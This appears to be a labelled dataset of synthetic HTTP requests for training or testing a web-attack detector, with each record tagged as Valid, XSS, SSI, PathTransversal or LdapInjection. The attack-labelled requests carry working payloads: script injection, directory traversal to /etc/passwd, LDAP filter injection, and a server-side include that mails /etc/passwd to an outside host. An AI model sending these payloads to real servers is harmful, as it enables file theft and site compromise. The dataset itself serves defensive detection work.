GET /l7las/b5Ieval/ueIy9aUE37dAzGZt1UD/6K/esmn8mnsolio2enDonip/te4lj/GKn6.2m6ainput/O5q/y1qlhb3HOE4sVM1/lratmmvtssqpEac9yew/dLlikeFPBstdinVF9/eBXCYrjyP0Zq8EWprV2J.cfm?QXbbBstdin.Hhaving=awuFHXoRNY.&lete9alUnu8a=1441985&onwomybe7beeo=ece%5Dx%5Dser&0iemB9mhttpt=2797 HTTP/1.0
Host: 254.134.150.95
Connection: keep-alive
Accept: image/*;q=0.1, video/*
Accept-Charset: ks_c_5601-1987, windows-1254;q=0.3, x-mac-roman;q=0.6, x-mac-roman;q=0.7
Accept-Encoding: *
Accept-Language: bvN-9Hehatdd;q=0.4, t-rttttc;q=0.4
Cache-Control: no-cache
Client-ip: 3.97.160.94
Cookie: M32Drnau=oiyni;cAesyhfjvs=dx1zO;Rdohed=881;nrxdryace1rea=rinsert3ov1wr;dhsAh1wnrsitgtl=)pUnetcattEroj
Cookie2: $Version="53"
Date: Tue, 01 May 07 05:46:27 GMT
ETag: W/"bSZN.hzV37mupqiLdQN"
Expect: 100-continue
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Wed, 18 Feb 04 22:35:55 GMT
If-Unmodified-Since: Mon, 27 Aug 07 16:36:23 GMT
If-Match: *
If-None-Match: "DK4uaFNGbE8eul4xIMuv"
If-Range: *
Max-Forwards: 7701
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM dDNuMHR1dGNnaHNsaHR1bmhtbm5vYWVlb2htcnRwdG51ZXllZXBkYXNvNHRvcg==
Authorization: Digest realm
Range: 014236-,328751-67,-519123
Referer: http://www.yRntab.com/leE2t.gif
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/8.4 (compatible; oikeualh; Linux i586; ikjEulifUd)
UA-CPU: PowerPC
UA-Disp: 1652,237,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2347x669
Via: FTP/6.1 www.Sdshuli.html, 4.8 244.161.54.211
Transfer-Encoding: p9wih; hbNsh8D=rg4wEanB
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
Warning: 729 222.217.184.32 "Seioo3tr0ha" "Sun, 22 Jul 07 15:10:27 GMT"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 28910349808
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14623
Start - Id: 46487
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.0
Host: www.ne91este.be
Connection: keep-alive
Accept: application/*;q=0.6, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=46800
Client-ip: 137.78.176.107
Cookie: k9PGff1aoWDn=iatqtbo7epedo;eTL0iri9trtpe=r7ch@deihdo;nntrs=0395;ssf9eAOdlt6ro=tdlibbnetcatv(affdi4 riss/j;AHNYq=arR;sFKIzsWsystemHnode3a=ei
Cookie2: $Version="45"
Date: Sun, 26 Apr 09 11:01:39 CET
ETag: W/"TvYPSOTjowia_CfKxOZ"
Expect: ith49hei=hrdod6si
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Sun, 13 Jul 08 07:51:28 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8099
Pragma: iyb7u=etotEb
Proxy-Authorization: detou Jxsacw=pheC
Authorization: teoNco nota=eade
Range: 875-8,3042-7550,-21263
Referer: http://eToarlbr.be/Sedjhhvl/chfetoi/tsc1/Ouvto2a/nTrnh.doc
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: am3p-sne http://www.afsTo.fr
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: 0.5 www.o9qe2l.htm, hfe9ia/0.7 www.skhsc7.js
Transfer-Encoding: compress
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 531 119.150.242.26 "jTg2xs5tderoaEpt" "Tue, 19 Feb 08 13:25:57 UTC"
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46487
Start - Id: 34272
class: Valid
PUT /nodeiWP3..gif? HTTP/1.1
Content-Length: 249
Content-Language: vr
Content-Encoding: identity
Content-Location: /eoshe/gwq2sSGt/nhihfepc.tar.gz
Content-MD5: bml0aXNpaE9hYXNwcWRtcg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Dec 07 17:09:37 UTC
Last-Modified: Wed, 20 Aug 08 02:05:29 GMT
Host: 246.220.164.110
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp;q=0.8, ks_c_5601-1987, cp-936;q=0.1, iso-8859-15;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 230.93.189.9
Cookie: epdeo67bthgr=itt;aS7xo=ueibrvt3i1rae3nsdk;oahn4ehasc=0;bnSt1mqHettyueh=ltsoaducedf0oeVr;vdwie=t:7re7&oth7cij
Cookie2: $Version="236"
Date: Fri, 23 Nov 07 09:21:40 GMT
ETag: W/"pmTNHPYgCSciJwXH"
Expect: 100-continue
From: 4ytj@b9euc4sM.it
If-Modified-Since: Fri, 17 Oct 08 22:41:15 CET
If-Unmodified-Since: Mon, 14 Jan 08 22:27:46 GMT
If-Match: *
If-None-Match: "LoWL2To6htvnWo76B.CV"
If-Range: Fri, 22 May 09 11:14:00 CET
Max-Forwards: 1
MIME-Version: 6.1
Pragma: ezP=chesmi
Proxy-Authorization: NTLM c2k3QXN0dHNVa2FhM3hhZWlydGhjb3FOZWl1c2JjbmFp
Authorization: Digest username="tiut"
Range: -412,6-
Referer: http://www.ylIls.ch/oahEa/eLstvX.swf
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.9 (compatible; Konqueror/3.8; Open BSD i386; eruesifmi; ckto8)
UA-CPU: 68000
UA-Disp: 1874,1837,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1417x508
Via: HTTP/1.8 www.nedooa.htm, tmttse/8.3 142.102.41.192
Transfer-Encoding: compress
Upgrade: ler/8.6, adth/8.2, itt/7.5
Warning: 445 www.dRtgo.jpeg "eeTzgb" 
X-Forwarded-For: 60.98.250.76
X-Serial-Number: 39183346351141805955
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

geauer=468328615&aeaaot1xft=499&aadr4=ukb;krrh&UlUa=35&lrxaRseiqyrgo=57569&e@SEJ8lmYhhv=object~ttu)aW&cwrtnsl6=tn6PU2czV8Ic&Flcrsw1rtuiI=511&ylyubra=oia&8vetcjz=hIy7BTHXX1Fo&NpgsS=snlfkiu2taj2N4&YurtmOZt=9704762&4ootieha=e84LgoXaj&rmex=3026087

End - Id: 34272
Start - Id: 40648
class: SSI
GET /f6jc/a9a/hHBuFA7AUoOM.gif?9kL7idpneee=5ieNbo&ehta4s=seeyiodaemsmms&EqvrDofafiW=sqeo+w%2B&koypldnumsN0ig5=t7eameti4eedu&kgiao7uol5ocet=6AF&etrhf85Hqtoei=%3C%21--+++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&uJ5Tnq-0d3=hsao HTTP/1.0
Host: 149.46.176.196
Connection: MpvsmSbn
Accept: */*
Accept-Charset: x-mac-chinesetrad, windows-1257;q=0.5, iso-8859-6, macintosh;q=0.8, iso-8859-8;q=0.7
Accept-Encoding: deflate;q=0.8, deflate;q=0.4, compress
Accept-Language: *
Cache-Control: oc5='c'
Client-ip: 26.207.222.161
Cookie: 0Reeynt=sa\;nalmm=65082
Cookie2: $Version="2"
Date: Mon, 23 Oct 06 01:45:26 GMT
ETag: "lBtTht_ysib8rxO9l@2"
Expect: 100-continue
From: OhLEoh@pga5e.org
If-Modified-Since: Thu, 11 May 06 22:07:16 GMT
If-Unmodified-Since: Tue, 14 Dec 04 03:54:56 GMT
If-Match: "mpZQ@IwxTC8g8jdXcuQZ"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 0.6
Pragma: bome=mwge
Proxy-Authorization: sfoht tsob=EeAAttxn
Authorization: NTLM b0hoMGVlOGd0ZXRhZTc3b25uc0M0Z2V2b2dvT3BvZXRoVGU=
Range: 176-,5948-8668,8671-305
Referer: /roet/tDiAr/j1aaytp4/OantotT/tharE.asmx
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: EmSe (xf6Ae@j)
UA-CPU: PowerPC
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 951x487
Via: FTP/0.9 www.dfite.htm
Transfer-Encoding: gzip
Upgrade: eeyr/9.4
Warning: 643 www.anntntto.js "msA0earuygs" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 552421
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40648
Start - Id: 45446
class: PathTransversal
GET /snsMDXDJc7bQC8T-_Q/ku7Q-4P/7aaDaeEt/iRYyOA.E3-zsOrB/@AnodeZyn1jVAqtmp/kB/wf@3KPW6LI3wgPENcmii.png?ushpif=lStga&eqhtn=9e%7Edsezbgsound&isaip9l=48715&vESg.bLz=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat HTTP/1.0
Host: 25.220.6.98:2
Connection: keep-alive
Accept: image/jpeg, audio/x-wav;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-age=651
Cookie: execWbF5W=4;e7meet=002503618;D5sK9=An0i;eu=i3HmQmU0Fstt;yie=xh ;cogtesthMalen=0820716
Cookie2: $Version="04"
Date: Thu, 06 Jan 05 19:29:11 CET
If-Modified-Since: Sun, 15 Jun 08 23:46:49 GMT
If-Unmodified-Since: Fri, 01 Jul 05 09:48:00 CET
If-Match: *
If-None-Match: "8_ctXRlnCKINx16eiKrq"
If-Range: "LMZywkUJ-bxFU3gyHd@Q"
Max-Forwards: 52
Pragma: sunhahaa=bie
Authorization: ol8si b5aft=hhohnl
Range: -8
Referer: /ipn21de/u5plen7a/r3eh17.pl
TE: deflate
User-Agent: Mozilla/0.7 (compatible; eaaitBr; Windows NT; t39h5ttto)
Via: etha6/3.0 238.84.73.164, pgohn/4.6 www.evawdcnw.tiff
Upgrade: ldu4yj/2.7, bmeN/8.1, deh/2.9
X-Forwarded-For: 176.191.17.103

null

End - Id: 45446
Start - Id: 24025
class: Valid
GET /e.@.-Fv@JNbvb9DS/2CD5gh@sBrG-n1/1ji9/arcetgn/aL3Y.SoK9u6Lk/hod1ImsethEabb/7ashutdownO@vYx5drop1D_/ners1oeernsm/ueugohaadlbiitpahl.dll?oe=194&tit9bTt=s%5CmrE%5DeimJr&a0aYAiihnwh4b=gIe%3Ba HTTP/1.0
Host: www.1humee.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: eYi7ce-rix, aneeb-Les4n, fiooe-n;q=0.1
Cache-Control: no-cache
Client-ip: 172.138.38.160
Cookie: pteluoeoi7=c7MLrw
Cookie2: $Version="5"
Date: Fri, 01 May 09 06:35:49 GMT
ETag: "s7ixD4fsb@27TuT"
Expect: 100-continue
From: 8ihnedd@EsreI51e7i.com
If-Modified-Since: Thu, 21 Dec 06 10:53:08 UTC
If-Unmodified-Since: Fri, 25 Feb 05 06:42:49 UTC
If-Match: "k6GLJXga0icBwLkJ2e"
If-None-Match: "BrIPpLGL1mRd8OnXNZz"
If-Range: "CsR9wajZmyL-HMpD"
Max-Forwards: 9994
MIME-Version: 8.1
Pragma: sets='aithnh7i'
Proxy-Authorization: NTLM cmhlYWVtbHJobkV5ZGVvaGl0U2Nzd28yemVvbGFyZlRoZTdRaGxSYXg=
Authorization: NTLM aGphZTJoQW55a2xUYXljOW1lYW5ldGljaWJpbm1vdGZn
Range: -2,64-,35201-
Referer: http://nitJoytc.cz/iiOutc/taaE/1oN7w5w.exe
TE: chunked;q=0.9,gzip
Trailer: Date
User-Agent: nShet/3.0.6.8
UA-CPU: PowerPC
UA-Disp: 4414,5382,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 314x0873
Via: 3.1 118.223.84.131
Transfer-Encoding: gzip
Upgrade: h3rE/8.7, eogee/2.9, td0aa/8.5, toirs/3.2, Lme/4.0
Warning: 560 www.e6Dyu8.png "snbntciioi9G" "Wed, 08 Apr 09 10:48:35 GMT"
X-Forwarded-For: 191.133.68.191
X-Serial-Number: 2341111640499
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24025
Start - Id: 26303
class: Valid
GET /sB4emc6Rc-Ykfl/XNIFHwR/pXxT@5IL4NPSs/iri3/esanuEleperu/eHY2XwINVEX/vJMK/soaknyrtisNgHhe/uy/w1yY3M9a2havingPunionUcO.swf?oyhcEl=eQDcSLi&sesoznctaSe9sh=6991762147&NlibVqe1Wf=3&tam=PchoL+2Datr&trh0avstnat=ia2m&dhoto7e=%29&@rQ7PTA=25588&L1cCIO=894284&ta5oigt=airI+&ie=nH9&A085oY7mailvxY=%3DwoavO&ey=rw&utnd6iwnlnxw=86961 HTTP/1.0
Host: 19.224.233.214
Connection: close
Accept: application/zip;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: deflate
Accept-Language: r8ta-e;q=0.4, dqidcy-o;q=0.6, IodgeDlr-crecATe, 1Veorol-ornm;q=0.9, rtiEiuio-txtsatob;q=0.9
Cache-Control: no-cache
Client-ip: 55.156.173.255
Cookie: sgiead=eDg_0;h0pad80t=04803908;hgm=7328;gMm=oMcuYdghpd;yerlaAhm3bnai=f/lqy
Cookie2: $Version="209"
Date: Fri, 01 Dec 06 21:14:00 UTC
ETag: W/"E6W2y.qV7uj_5gez2TxL"
Expect: 100-continue
From: kadm@gerbpeiwsn.org
If-Modified-Since: Sun, 08 Mar 09 23:05:23 CET
If-Unmodified-Since: Fri, 18 Feb 05 19:58:54 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 35
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic Zmhpc2U6c3RlaWlhbzE=
Authorization: NTLM c2luc3d0aWlhdGVzMncwdGM2dHJwbHBPeWxzZXByZW5haW5hdG9u
Range: 338-840605
Referer: /sEayea/iatptweo/nw9exd.wav
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/7.6 (Machintosh; U; PPC 4.3; ho-at; rv:5.2.4) Gecko/52336285
UA-CPU: PowerPC
UA-Disp: 052,216,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3902x9522
Via: HTTP/3.5 www.esGot3r.tiff, 4.0 www.lnSnehi.jpeg, HTTP/2.8 www.Vrnhi.css
Transfer-Encoding: gzip
Upgrade: 7tTa/7.8, stro8/9.2, aysmr/9.8
Warning: 505 www.i0e1ateH.gif "k3cpb0eut6nh3" "Fri, 02 Jun 06 13:47:27 CET"
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 8772849575
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 26303
Start - Id: 24491
class: Valid
GET /eZ/whoaroay/iMXJBum9i1ya/t9qX0qqzinqeRk-cU7/oTy@SKPIxdJuv6HZHCQS.cfm?onrrnucfnoualee=44392&4unoahVssT=qjannsetcr5n&e6H9MvAtWsI=922602709&67p=7392246&piD34=h9tiw7kn HTTP/1.1
Host: www.Fulfsts.it:95056
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 72.213.149.164
Cookie: eesctfaen=0898;PIr5dt=dnmpmoo;yglw=mosOoa1fcc24;4itnfq=l=or-;v05esdl=m
Cookie2: $Version="241"
Date: Fri, 21 Apr 06 08:12:07 UTC
ETag: "RCoDfi8cw9gTDD1Xc"
Expect: Esrdo=Ssfhmjt;toupanta
From: grtsaui@oahrelty.gov
If-Modified-Since: Tue, 25 Nov 08 16:22:06 UTC
If-Unmodified-Since: Sat, 01 Jan 05 23:05:54 CET
If-Match: *
If-None-Match: "CudTdNSArQwRUyalHm"
If-Range: *
Max-Forwards: 8468
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic YmRoczc6d3Rvcw==
Authorization: tihe6 rpvb=e63etgvr
Range: -7
Referer: http://www.2utm2.cz/iiSttE.nsf
TE: trailers,trailers
Trailer: TE
User-Agent: ptqe/0.6
UA-CPU: Sparc
UA-Disp: 9148,760,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0451x999
Via: FTP/6.2 www.7ulAvtuO.jpg, HTTP/7.0 239.107.104.141:0
Transfer-Encoding: dso2; weeedl=delEku4w
Upgrade: sem/4.3, wo5ey/5.5, nzioc/1.6
Warning: 067 181.89.226.75 "tdonimnv7ju2Go" 
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 97965409740339
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24491
Start - Id: 17331
class: Valid
GET /koCDuD0f/oLz29fCb8C/erE9Lzcdm_@O4Z@/abzzHz.biN8b/uU7CXYK8nWT@iWRH4Ygl.css?Hcsrgsoubt5mnee=Ns&nndrmoen=ee2&MhAsx8dO=iah&uenyz=943378&hcyfgaE0=4 HTTP/1.1
Host: www.odeem3.fr:60544
Connection: keep-alive
Accept: application/zip, video/*, audio/basic;q=0.2
Accept-Charset: iso-8859-8;q=0.9, x-mac-arabic;q=0.8, iso-8859-8, windows-1255;q=0.8, utf-7
Accept-Encoding: compress
Accept-Language: sdd-6Olbu, geikws-ejni
Cache-Control: only-if-cached
Client-ip: 215.192.93.50
Cookie: dndybodruaa=A 9s;nomnwsomrw3e=nxg;TOrhtntso=1rdivim;7oapeo4pFdehC=i@LmnGYoV9;BX-vco8UT=snfscriptw0e4tewRnctekt3;iohim=eIteawun
Cookie2: $Version="840"
Date: Sun, 01 Jan 06 04:48:45 UTC
ETag: W/"oH-9IEVzvYszjTYG"
Expect: 100-continue
From: 1rsdas@zamn2no.de
If-Modified-Since: Thu, 17 Dec 09 13:31:25 UTC
If-Unmodified-Since: Tue, 16 Oct 07 24:42:10 UTC
If-Match: *
If-None-Match: "JhVZ@tv.XdXvrzLTy"
If-Range: "6zxEAMwvFoZaGmly2G"
Max-Forwards: 06
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest uri=/dEasnr/nifefdsN/jtmItno/tqlthnia/esaa.dll
Authorization: Digest qop=aeeuu
Range: 570800-
Referer: /tmtta/4s5f.pdf
TE: trailers
Trailer: Range
User-Agent: wu8Tnir5njsalliWcbl
UA-CPU: 68000
UA-Disp: 1914,5330,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 455x7663
Via: 0.1 139.36.189.20, FTP/2.7 www.7jU8.html:04
Transfer-Encoding: gzip
Upgrade: miR/8.7
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 137.232.96.91
X-Serial-Number: 75371955994853740
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17331
Start - Id: 20266
class: Valid
GET /satih4cahl/Ihrla/nermAmzxn.aspx? HTTP/1.0
Host: www.luhne.it:80
Connection: mo48e
Accept: image/jpeg, audio/*;q=0.7, audio/x-wav
Accept-Charset: iso-8859-8;q=0.9, utf-7;q=0.3
Accept-Encoding: deflate, compress
Accept-Language: *
Cache-Control: htIadnih=1hsc
Client-ip: 66.96.116.160
Cookie: azpoc=hPCv;G--CphPrPV8=42;jre2imh4rjei= y2a0nrdw;IUo_rZ=ef8cxK;olair4hht=f
Cookie2: $Version="389"
Date: Sat, 25 Mar 06 10:23:06 GMT
ETag: "GRSd.RAB2xqYJdR"
Expect: eata
From: xq5smoil@s5t5aue.biz
If-Modified-Since: Sun, 06 Jul 08 10:32:56 GMT
If-Unmodified-Since: Thu, 14 Dec 06 13:38:11 UTC
If-Match: "cF.nRbAfVdaIirbf9kFK"
If-None-Match: "ik@htwPUK3N_-GjxZU9"
If-Range: Wed, 28 Apr 04 13:10:22 GMT
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Y25lYWFlZXJybjZHZXNkYXRzY21ld2VvZG5zOHVhaGRseGVmZWVodGd3c29lbA==
Authorization: Digest username="paga7iqh"
Range: -064
Referer: http://www.4hethem.org/c2q3ae/lbafr.php4
TE: trailers,chunked,deflate
Trailer: Accept-Language
User-Agent: Mozilla/0.1 (Machintosh; U; PPC 0.5; mh-9n; rv:8.1.4) Gecko/23943318
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0564x652
Via: N1rri/2.2 www.nke7e.jpg, HTTP/7.2 www.otP4.tiff:0843, sNc/0.1 www.aq5nle.gif
Transfer-Encoding: identity
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 058 www.eyes9l.tiff "iseRqeh6t" 
X-Forwarded-For: 33.165.104.226
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 20266
Start - Id: 38829
class: LdapInjection
GET /eM2eonoswief/ipruhtmY72e5i6tttEts/wh5tLpy/tn/2965C_XV59PpRT.msf?sdgEtnV=s3-ZY&te3a=973&vt=w%2Fra&pvdt7sdiephay8=7349985&Hxeosbrroasee=i&hEtx2aewaaiyee=fhome1o&tnltuenNa=nV.ZoGoai&usrZGzrDI=3&nnrcoerfis=uM9CqA7&ruh66le81as4hu=emitdznyumiulod&e4Tmlirmoye=9658&rtvhahswdno=qDgT&We4v=ao%29%28%26%28objectClass++++%3D+++ed5i*%29&TKnhwindow.openirK3q=6Bzs34MYF9p&X5xp_G54MI_=7 HTTP/1.1
Host: 216.130.184.152
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 147.81.36.108
Cookie: snevOhqnc0wm=itHirhsrahttpseui;3nhoc65by=hn2YgII;Umt=7439213969;irlpm8tcIcptrpr=dzo4;lfshixa=1ltd ERk 
Cookie2: $Version="4"
Date: Mon, 10 Oct 05 21:18:04 GMT
ETag: ".E54oRpEfAdmv5Espqw"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Fri, 25 Jul 08 15:39:35 GMT
If-Unmodified-Since: Tue, 25 Jan 05 12:33:46 CET
If-Match: *
If-None-Match: "8mdIMWuq4Ksbg@kn@pR3"
If-Range: Sat, 28 Feb 04 10:57:59 CET
Max-Forwards: 3543
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: NTLM aWxhZnJzc2Nlc2ZvRWF0bWVwc3Jlb3NzaWFzZG9lNXVnbGRhcmh1aGU=
Range: 49-
Referer: http://eiri.it/syldi/8aX1x.mpg
TE: trailers,trailers
Trailer: If-Range
User-Agent: t7DABD67 http://www.htile1bh.it
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8161x590
Via: aluse/4.0 www.pieo.css, FTP/9.2 53.125.135.140:7, HTTP/6.9 www.z5Nh.htm
Transfer-Encoding: gzip
Upgrade: 5e2/8.1, neual/2.6, shex0/3.0, srtfSe/9.7
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38829
Start - Id: 46133
class: PathTransversal
GET /edlroewhaliroogaT/h5YBFC/tBLKFIn4i5LYIXn7U-/aT3vCEfm8aKbmdSIpb/VUjY/aaascryT2srvtstt/ozRxf7jk.sh?5sC92l3=71133&bxBaOM=u&Pl4Srpl=rei&d18srd4=ana3&aovh=028340&as1Eettuo=aclUBWMEf&2gDwgete0xRG=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&hart1tntsn4t=5r%3EtE%28+t%7Cetc%26sguf%2Fc%3F&iacTti=Aabeye9lhso HTTP/1.1
Host: 68.231.38.227:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-2, windows-1251;q=0.4, windows-1257, windows-874;q=0.2, windows-1253;q=0.8
Accept-Encoding: deflate;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 192.251.83.14
Cookie: n6E5lemaHnn=iUxicVvEfGO;r1go_=3stsrheau;CBiNO-=connect2oa5tyawbbmdmey8T ;AlgniNnpilr=0ool
Cookie2: $Version="272"
Date: Sat, 01 Jan 05 12:07:08 CET
ETag: W/"vMDloPJ7nBvdxA8cggU"
Expect: esCbr8Le=Nod58
From: r9hecgen@ob8h.it
If-Modified-Since: Thu, 15 Nov 07 01:14:07 GMT
If-Unmodified-Since: Mon, 04 Aug 08 20:23:35 UTC
If-Match: *
If-None-Match: "gSMREJNl9MM9dFNO"
If-Range: *
Max-Forwards: 931
Pragma: hRa=dcR
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: cOnr 0keiminm=fEu1eshg
Referer: http://rEt2z.cz/e7yerjl2/exvoie/Mic9E/7Dq3dr/icyeio.zip
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/5.3 (X11; U; Open BSD i386 8.5; Du-to; rv:0.2.1) Gecko/35911600
Via: 5.8 60.120.123.179, 0.3 112.146.52.219
Transfer-Encoding: identity
Upgrade: 4sr0z/5.8, 5eIsba/5.8, lviujp/4.0, arJ2h/2.1, fgge/2.5
X-Serial-Number: 83931
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46133
Start - Id: 27566
class: Valid
GET /li7zmH/iR6X.nsf? HTTP/1.1
Host: www.8tdsttesxa.ch
Connection: eueez
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 242.247.6.159
Cookie: mTsorrd5s=arfsdke
Cookie2: $Version="6"
Date: Sun, 20 Aug 06 03:36:43 CET
ETag: "7I@X5QIS9AfIHIcSh7UC"
Expect: ruoo5sLm=7puwnt;dkyt
From: nmsse@isns5lO.de
If-Modified-Since: Mon, 04 Jul 05 07:08:11 CET
If-Unmodified-Since: Mon, 05 Nov 07 05:49:34 CET
If-Match: *
If-None-Match: ".dhagL1w-c8FSUYV"
If-Range: "dcwF364jqM5QStER-G"
Max-Forwards: 9698
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: NTLM c2V3ZWEyQWhneDhnZnRWdG80dG9tdG5ycnRldHJtY2VpNw==
Authorization: Basic b3NEdGFhaTpFaGdueW8=
Range: 0-33,159-222311,3856-
Referer: http://www.niox.net/0yaiIu/vthrQtd/Pceylo/rr5h42/thnleoe.css
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: rd76rixon0 (nTz215k7z6; r74XjKMOw2; vxQMvo_s)
UA-CPU: 68000
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4534x344
Via: HTTP/7.6 241.129.162.21
Transfer-Encoding: identity
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 197 179.125.106.204:45943 "tentotelsaAsctyrRtpu" 
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 76901665181608584434
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27566
Start - Id: 40098
class: SSI
GET /sI2g5cdkdP6uw7GxD.php4?vhzbboin=T4nsee&ftostd=crZzvY&g09uert=eic&z4irwrou=2051566505&rm1o8Znhwp-fBQ=46753708&53mi5=tomr&ufhiEhuslitc=yelibw%7Cnph-shutdown&ee8tcj4w=Tr&tl=i1ec0tZ0&tctigi5s=iyt&lsaHbpE=%3C%21--%23exec+++cmd%3D%22%2Fbin%2Fmail++dqabr.com+%3C+++%2Fetc%2Fpasswd%22--%3E&eo9Rq4emiBhw=a_t6r92qXO2&5s=uKk%40QsOMau4 HTTP/1.0
Host: www.netnozhtfe.fr
Connection: mnti
Accept: */*
Accept-Charset: windows-1255, iso-8859-9, windows-1251;q=0.0
Accept-Encoding: identity;q=0.1, identity, compress;q=0.0, compress;q=0.4, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 157.57.193.69
Cookie: Omir=22698
Cookie2: $Version="5"
Date: Sun, 24 Feb 08 14:25:54 CET
ETag: "qLv-t8I1Jj6l-hqVR1h"
Expect: smk9rHu
From: tpzurs@nibEe.it
If-Modified-Since: Sun, 21 Oct 07 05:23:42 CET
If-Unmodified-Since: Fri, 23 May 08 22:59:36 GMT
If-Match: *
If-None-Match: *
If-Range: "YSlp-R3rBSXZ2bPVpIM"
Max-Forwards: 6
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://hOaez.ch/vyle/adcoet/ecied4i/lmeje/fyuT.htm
Authorization: Basic czBMcnNhOmhwdEI=
Range: 1646-745
Referer: http://tRen.fr/7tSai.css
TE: trailers,chunked
Trailer: Connection
User-Agent: ufSn3T (nET6S8q; nl.NT4N8CX; iJxJ@2Ze; o9bm-5gyL7)
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0944x596
Via: 2nqH/0.5 217.64.156.141
